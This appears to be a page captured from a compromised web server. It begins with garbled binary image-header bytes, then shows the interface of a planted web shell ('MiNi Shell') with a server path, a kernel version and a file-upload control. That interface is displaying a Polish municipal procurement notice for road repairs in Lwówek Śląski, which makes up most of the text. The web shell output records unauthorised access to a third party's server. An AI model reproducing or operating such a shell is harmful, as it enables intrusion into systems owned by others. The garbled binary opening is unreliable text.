JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220131/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220131/0004220601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remonty nawierzchni bitumicznych i tłuczniowych wraz z infrastrukturą towarzyszącą wykonywane w ramach bieżących remontów dróg gminnych na terenie miasta i gminy Lwówek Śląski </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina i Miasto Lwówek Śląski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000530643</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. Wojska Polskiego 25A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lwówek Śląski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">756477888</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@lwowekslaski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.lwowekslaski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remonty nawierzchni bitumicznych i tłuczniowych wraz z infrastrukturą towarzyszącą wykonywane w ramach bieżących remontów dróg gminnych na terenie miasta i gminy Lwówek Śląski </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bfd89ee3-8297-11ec-beb3-a2bfa38226ab</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00042206</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-01-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00039112/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.10 Remonty nawierzchni bitumicznych i tłuczniowych wraz z infrastrukturą towarzyszącą wykonywane w ramach bieżącego utrzymania dróg gminnych na terenie miasta i gminy Lwówek Śląski</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/lwowekslaski <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/lwowekslaski</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.<br/>Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem<br/>platformazakupowa.pl dalej: „Platforma”, pod adresem: https://platformazakupowa.pl/pn/lwowekslaski.<br/>2. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy<br/>użyciu środków komunikacji elektronicznej wskazanych w SWZ. 3. Funkcjonalność Platformy<br/>gwarantuje złożenie przez Wykonawcę w postępowaniu zaszyfrowanej oferty wraz z załącznikami, w<br/>sposób uniemożliwiający Zamawiającemu zapoznanie się z treścią oferty przed upływem terminu<br/>składania ofert. 4. W toku prowadzonego postępowania komunikacja między Wykonawcami a<br/>Zamawiającym prowadzona będzie za pośrednictwem Platformy. Wszelkie oświadczenia, wnioski,<br/>zawiadomienia oraz informacje, przekazywane będą za pośrednictwem formularza „Wyślij wiadomość<br/>do zamawiającego”. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz<br/>informacji przyjmuje się datę ich przesłania za pośrednictwem Platformy poprzez kliknięcie przycisku<br/>„Wyślij wiadomość do zamawiającego”, po których pojawi się komunikat, że wiadomość została<br/>wysłana do Zamawiającego. 5. Zamawiający będzie przekazywał Wykonawcom informacje w postaci<br/>elektronicznej za pośrednictwem Platformy. Informacje dotyczące odpowiedzi na pytania, zmiany<br/>specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na Platformie<br/>w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest<br/>konkretny Wykonawca, będzie przekazywana w postaci elektronicznej za pośrednictwem platformy do<br/>konkretnego Wykonawcy. 6. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania<br/>komunikatów i wiadomości przesłanych przez Zamawiającego bezpośrednio na Platformie, gdyż<br/>system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM. 7.<br/>Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452), określa niezbędne wymagania<br/>sprzętowo - aplikacyjne umożliwiające pracę na Platformie, tj.: 7.1. stały dostęp do sieci Internet o<br/>gwarantowanej przepustowości nie mniejszej niż 512 kb/s, 7.2. komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje, 7.3.<br/>zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10<br/>0., 7.4. włączona obsługa JavaScript, 7.5. zainstalowany program Adobe Acrobat Reader lub inny<br/>obsługujący format plików .pdf, 7.6. platformazakupowa.pl działa według standardu przyjętego w<br/>komunikacji sieciowej - kodowanie UTF8, 7.7. Oznaczenie czasu odbioru danych przez platformę<br/>zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu lokalnego serwera<br/>synchronizowanego z zegarem Głównego Urzędu Miar. 8. Do przygotowania oferty konieczne jest<br/>posiadanie przez osobę upoważnioną do reprezentowania Wykonawcy kwalifikowanego podpisu<br/>elektronicznego, podpisu osobistego lub podpisu zaufanego. 9. Podpisy kwalifikowane<br/>wykorzystywane przez Wykonawców do podpisywania wszelkich plików muszą spełniać wymogi<br/>określone w Rozporządzeniu Parlamentu Europejskiego i Rady w sprawie identyfikacji elektronicznej i<br/>usług zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym (eIDAS) (UE) nr<br/>910/2014.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. TOŻSAMOŚĆ ADMINISTRATORA: Administratorem<br/>Państwa danych osobowych jest: Burmistrz Gminy i Miasta Lwówek Śląski, z siedzibą w Lwówku<br/>Śląskim (59-600) przy al. Wojska Polskiego 25 A; 2. DANE KONTAKTOWE ADMINISTRATORA: Z<br/>administratorem – Burmistrzem Gminy i Miasta Lwówek Śląski można się skontaktować pisemnie na<br/>adres siedziby administratora oraz poprzez adres e-mail sekretariat@lwowekslaski.pl, tel. 75 6477888.<br/>3. DANE KONTAKTOWE INSPEKTORA OCHRONY DANYCH: Administrator : Burmistrz Gminy i<br/>Miasta Lwówek Śląski wyznaczył inspektora ochrony danych, z którym może się Pani / Pan<br/>skontaktować poprzez e-mail iod@lwowekslaski.pl lub pisemnie na adres siedziby administratora. Z<br/>inspektorem ochrony danych można się kontaktować we wszystkich sprawach dotyczących<br/>przetwarzania danych osobowych oraz korzystania z praw związanych z przetwarzaniem danych. 4.<br/>CELE PRZETWARZANIA I PODSTAWA PRAWNA: Pani / Pana dane będą przetwarzane w celu: -<br/>przeprowadzenia postępowania o udzielenie zamówienia w trybie ustawy Pzp; - w przypadku<br/>wyłonienia wykonawcy - w celu realizacji przedmiotu zamówienia. Pani/Pana dane będą przetwarzane<br/>na podstawie przepisów: - Ustawa z dnia 11 września 2019 r. Prawo zamówień publicznych; -<br/>Zarządzenie Nr IN.0050.18.2021 Burmistrza Gminy i Miasta Lwówek Śląski z dnia 28 stycznia 2021 r.<br/>w sprawie zatwierdzenia Regulaminu udzielania zamówień publicznych o wartości do 130 000 zł. 5.<br/>ODBIORCY DANYCH: Pani/Pana dane osobowe przekazywane będą: - podmiotom upoważnionym na<br/>podstawie przepisów prawa; - osobom lub podmiotom, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 18 i 19 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych;<br/>- usługodawcom wykonującym zadania na zlecenie Administratora w ramach świadczonych usług<br/>serwisu i utrzymania systemów i programów informatycznych, z którymi administrator ma podpisane<br/>stosowne umowy powierzenia danych. 6. PRZEKAZANIE DANYCH OSOBOWYCH DO PAŃSTWA<br/>TRZECIEGO LUB ORGANIZACJI MIĘDZYNARODOWEJ: Pani/Pana dane osobowe nie będą<br/>przekazywane poza Europejski Obszar Gospodarczy. Z uwagi na charakter świadczonych usług przez<br/>podmiot przetwarzający, dane osobowe będą przechowywane w chmurze obliczeniowej, a wszystkie<br/>serwery zlokalizowane będą na terenie Unii Europejskiej. 7. OKRES PRZECHOWYWANIA DANYCH:<br/>Pani/Pana dane osobowe ujęte w protokole postępowania wraz z załącznikami będą przechowywane,<br/>zgodnie z art. 78 ust. 1 Pzp, przez okres nie krótszy niż 4 lata od dnia zakończenia postępowania o<br/>udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania<br/>obejmuje cały czas trwania umowy. Państwa dane zarejestrowane na platformie zakupowej będą<br/>przechowywane a następnie zarchiwizowane przez okres max 10 lat od dnia upływu terminu składania<br/>ofert. CIĄG DALSZY W &#34;Informacje dodatkowe&#34;.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1. Skorzystanie przez osobę, której dane osobowe dotyczą,<br/>z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679,<br/>nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień<br/>umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą. 2. W postępowaniu o<br/>udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1<br/>rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego<br/>postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IN.271.4.2022.AB</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest zadanie pod nazwą: „Remonty nawierzchni bitumicznych i tłuczniowych wraz z infrastrukturą towarzyszącą wykonywane w ramach bieżących remontów dróg gminnych na terenie miasta i gminy Lwówek Śląski” poprzez wykonywanie remontów nawierzchni dróg, chodników, ciągów pieszych i pieszo-jezdnych, placów, zatok postojowych wraz infrastrukturą towarzyszącą. <br/>Szczegółowy opis przedmiotu zamówienia zawarty jest SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233142-6 - Roboty w zakresie naprawy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45233141-9 - Roboty w zakresie konserwacji dróg</p> <p class="mb-0">45233162-2 - Roboty budowlane w zakresie ścieżek rowerowych</p> <p class="mb-0">45233252-0 - Roboty w zakresie nawierzchni ulic</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielanie zamówień na podstawie art. 214 ust. 1 pkt. 7 i 8 Ustawy polegających na powtórzeniu podobnych usług, zgodnych z przedmiotem zamówienia podstawowego obejmujących zmówienia na roboty budowlane w zakresie bieżącego utrzymania dróg gminnych wraz z infrastrukturą o wartości nieprzekraczającej 300 000,00 zł.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty Zamawiający będzie się kierował następującymi<br/>kryteriami: cena oferty (brutto) - znaczenie 60%, stawka robocizny netto (zł/r-g) [R] - znaczenie 10 %, wskaźnik narzutu kosztów pośrednich (%) [Kp] od (R + S) - znaczenie 15%, wskaźnik narzutu zysku (%) [Z] od (R + S + Kp) - znaczenie 15%<br/>2. Ocena ofert będzie się odbywała wg następujących zasad: W kryterium „cena” (Kc)<br/>Zamawiający dokona oceny punktowej każdej z ofert zgodnie z formułą: Kc= (cena najniższa)/(cena<br/>oferty badanej) ×100 pkt ×60%; W kryterium &#34;stawka robocizny netto&#34; (R)<br/>Zamawiający dokona oceny punktowej każdej z ofert zgodnie z formułą: R= (najniższa stawka robocizny kosztorysowej netto (zł/r-g))/(stawka robocizny kosztorysowej netto (zł/r-g)oferty badanej) ×100 pkt ×10%; W kryterium „wskaźnik narzutu kosztów zakupu” (Kp), Zamawiający dokona oceny punktowej każdej z ofert, zgodnie z formułą: Kp=(Najniższy wskaźnik narzutu kosztów pośrednich (%))/(Wskaźnik narzutu kosztów pośrednich oferty badanej (%)) x 100 pkt x 15%; Dotyczy robót budowlanych nie ujętych w przedmiocie zamówienia podstawowego w kryterium „wskaźnik narzutu zysku” (Z), Zamawiający dokona oceny punktowej każdej z ofert, zgodnie z formułą: Z=(Najniższy wskaźnik narzutu zysku (%))/(Wskaźnik narzutu zysku oferty badanej (%)) x 100 pkt x 15%. Ogółem uzyskana ilość punktów przez badaną ofertę (Po):<br/>Po = C + R + Kp + Z<br/>Ocena punktowa oferty będzie zaokrąglona do dwóch miejsc po przecinku i wyrażona liczbą.<br/>Za ofertę najkorzystniejszą uznana zostanie oferta, która uzyska ogółem największą ilość punktów „Po”.<br/>3.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim wymaganiom przedstawionym w Ustawie oraz w SWZ i zostanie oceniona, jako najkorzystniejsza w oparciu o podane kryteria wyboru.<br/>4.	Jeżeli nie można będzie dokonać wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej ofert przedstawiać będzie taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybierze ofertę z niższą ceną, a jeżeli zostały złożone oferty o takiej samej cenie, Zamawiający wezwie Wykonawców, którzy złożyli te oferty do złożenia w określonym terminie ofert dodatkowych.<br/>5.	Zamawiający wybiera ofertę najkorzystniejszą w terminie związania ofertą określonym w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny, kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wskaźnik narzutu kosztów pośrednich (%)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wskaźnik narzutu zysku (%)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: 1.<br/>Sytuacji ekonomicznej lub finansowej. Wykonawca spełni warunek jeżeli wykaże, że: a) jest<br/>ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej<br/>na kwotę min. 250 000,00 zł (słownie zł: dwieście pięćdziesiąt tysięcy); b) posiada środki finansowe lub zdolność<br/>kredytową, w okresie nie wcześniejszym niż 3 miesiące przed złożeniem oferty na kwotę nie mniejszą niż 80 000,00 zł (słownie zł: osiemdziesiąt tysięcy); 2. Zdolności technicznej lub<br/>zawodowej. Wykonawca spełni warunek jeżeli wykaże, że: a) Wykonawca spełni warunek, jeżeli<br/>wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wykonał min. 1 robotę budowlaną, której przedmiotem był remont dróg o nawierzchni bitumicznej, tłuczniowej o wartości robót nie mniejszej niż 200 000,00 zł brutto. b) Dysponuje osobą<br/>pełniącą funkcję Kierownika robót stosownie do przepisów ustawy Prawo budowlane, posiadającą uprawnienia<br/>budowlane do kierowania robotami w specjalności drogowej oraz będącą<br/>członkiem właściwej terytorialnie Izby Inżynierów Budownictwa. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Aktualne na dzień składania ofert oświadczenie Wykonawcy o spełnianiu warunków udziału w<br/>postępowaniu oraz o braku podstaw do wykluczenia z postępowania – zgodnie z Załącznikiem nr 2 do<br/>SWZ; 2. Informacje zawarte w oświadczeniu, o którym mowa w pkt 1 stanowią wstępne potwierdzenie,<br/>że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu. 3.<br/>Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej<br/>grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów,<br/>z innym Wykonawca, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do<br/>udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o<br/>dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej<br/>grupy kapitałowej – wzór załącznik nr 8 do SWZ. 4. Odpis lub informacja z Krajowego Rejestru<br/>Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust.<br/>1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne<br/>przepisy wymagają wpisu do rejestru lub ewidencji. 5. Oświadczenie o 